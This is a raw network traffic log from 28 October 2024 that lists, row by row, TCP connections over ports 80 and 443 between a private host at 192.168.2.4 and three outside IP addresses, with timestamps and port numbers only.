Oct 28, 2024 19:04:19.122982025 CET	443	49733	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:19.123102903 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:19.123475075 CET	49733	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:19.126672983 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:19.128005028 CET	49734	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:19.133160114 CET	80	49731	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:19.133239031 CET	49731	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:19.133519888 CET	80	49734	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:19.133594990 CET	49734	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:19.133683920 CET	49734	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:19.139308929 CET	80	49734	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:20.013550997 CET	80	49734	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:20.015489101 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.015527964 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.015630007 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.016107082 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.016123056 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.062755108 CET	49734	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:20.655958891 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.658458948 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.658478975 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.816893101 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.816953897 CET	443	49735	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:20.817008018 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.818250895 CET	49735	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:20.827660084 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:20.833208084 CET	80	49736	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:20.833302021 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:20.833590031 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:20.839045048 CET	80	49736	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:21.702743053 CET	80	49736	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:21.704941034 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:21.704986095 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:21.705056906 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:21.705564976 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:21.705580950 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:21.750108957 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.351840973 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:22.368413925 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:22.368427038 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:22.531413078 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:22.531467915 CET	443	49737	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:22.531821966 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:22.532365084 CET	49737	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:22.539247036 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.540863037 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.545053005 CET	80	49736	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:22.545172930 CET	49736	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.546320915 CET	80	49738	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:22.546412945 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.546587944 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:22.552023888 CET	80	49738	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:23.419681072 CET	80	49738	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:23.421042919 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:23.421072006 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:23.421200037 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:23.421499014 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:23.421513081 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:23.468853951 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.068684101 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:24.083767891 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:24.083795071 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:24.234802961 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:24.234879971 CET	443	49740	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:24.235146999 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:24.246125937 CET	49740	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:24.263262033 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.264712095 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.269244909 CET	80	49738	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:24.269553900 CET	49738	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.270148039 CET	80	49742	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:24.270227909 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.273741007 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:24.279145002 CET	80	49742	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:25.148843050 CET	80	49742	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:25.150949001 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.151025057 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.151102066 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.151571989 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.151608944 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.203216076 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.424892902 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:25.424926996 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:25.425144911 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:25.431365013 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:25.431390047 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:25.774045944 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.781291962 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.781354904 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.945493937 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.945554972 CET	443	49745	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:25.945765018 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.946041107 CET	49745	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:25.949055910 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.950088024 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.955400944 CET	80	49742	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:25.955466032 CET	49742	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.955498934 CET	80	49747	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:25.955574036 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.955662966 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:25.961106062 CET	80	49747	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:26.820468903 CET	80	49747	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:26.825454950 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:26.825505972 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:26.825579882 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:26.829598904 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:26.829641104 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:26.875097036 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.238890886 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.238996029 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.240881920 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.240896940 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.241242886 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.281363964 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.339814901 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.387325048 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.474030018 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:27.482763052 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:27.482801914 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:27.659691095 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:27.659765959 CET	443	49748	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:27.659826040 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:27.660212994 CET	49748	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:27.663748980 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.664258957 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.671339989 CET	80	49750	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:27.671462059 CET	80	49747	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:27.671550989 CET	49747	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.671659946 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.671659946 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:27.679004908 CET	80	49750	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:27.780076981 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.828357935 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.828377008 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.875104904 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.934088945 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934103966 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934132099 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934139967 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934155941 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.934170008 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934202909 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:27.934215069 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:27.984462023 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.088973045 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.088987112 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.089013100 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.089020967 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.089044094 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.089054108 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.089188099 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.089188099 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.209770918 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.209781885 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.209809065 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.209820032 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.209841013 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.209847927 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.209865093 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.209899902 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.331151962 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.331180096 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.331223965 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.331279039 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.331289053 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.331320047 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.331338882 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.408668995 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.408690929 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.408768892 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.408801079 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.408857107 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.518253088 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.518275976 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.518362045 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.518374920 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.518431902 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.531817913 CET	80	49750	132.226.247.73	192.168.2.4
Oct 28, 2024 19:04:28.534214020 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:28.534240961 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:28.534317970 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:28.534580946 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:28.534591913 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:28.578227043 CET	49750	80	192.168.2.4	132.226.247.73
Oct 28, 2024 19:04:28.606360912 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.606384993 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.606484890 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.606498957 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.606554031 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.726170063 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.726188898 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.726371050 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.726389885 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.726532936 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.813321114 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.813342094 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.813424110 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.813437939 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.813482046 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.933331013 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.933351994 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.933394909 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.933408022 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:28.933444977 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:28.933465004 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.015825033 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.015846968 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.015906096 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.015918970 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.015965939 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.015986919 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.087488890 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.087511063 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.087577105 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.087589025 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.087635040 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.174139977 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.174159050 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.174274921 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.174284935 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.174338102 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.188983917 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:29.190706968 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:29.190731049 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:29.294382095 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.294405937 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.294514894 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.294537067 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.294593096 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.327990055 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.328013897 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.328138113 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.328151941 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.328239918 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.353343964 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:29.353414059 CET	443	49752	188.114.97.3	192.168.2.4
Oct 28, 2024 19:04:29.353486061 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:29.354043007 CET	49752	443	192.168.2.4	188.114.97.3
Oct 28, 2024 19:04:29.415493965 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.415524006 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.415745020 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.415760040 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.415813923 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.450953960 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.450979948 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.451061964 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.451071978 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.451121092 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.536501884 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.536521912 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.536592960 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.536604881 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.536652088 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.985794067 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.985809088 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.985843897 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.985915899 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.985929966 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.985970974 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.985996008 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.986219883 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.986234903 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.986304998 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.986310959 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.986357927 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.989063025 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.989084005 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.989165068 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.989171028 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.989214897 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.991902113 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.991918087 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.992053032 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.992059946 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.992147923 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.993798971 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.993814945 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.993894100 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.993901014 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.993946075 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.996309042 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.996331930 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.996403933 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:29.996412039 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:29.996454000 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.017277002 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.017299891 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.017416000 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.017429113 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.017487049 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.050331116 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.050379038 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.050560951 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.050570965 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.050622940 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.137383938 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.137439013 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.137536049 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.137548923 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.137597084 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.138972998 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.139014959 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.139070034 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.139076948 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.139095068 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.139127970 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.220727921 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.220793962 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.220844984 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.220854998 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.220873117 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.220901966 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.258754969 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.258774042 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.258853912 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.258862972 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.258910894 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.293663979 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.293684006 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.293745995 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.293756962 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.293771029 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.293801069 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.378562927 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.378586054 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.378660917 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.378680944 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.378730059 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.411355019 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.411372900 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.411447048 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.411457062 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.411485910 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.411510944 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.498584986 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.498655081 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.498733997 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.498744011 CET	443	49746	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:30.498790979 CET	49746	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:30.498806953 CET	49746	443	192.168.2.4	188.132.193.46
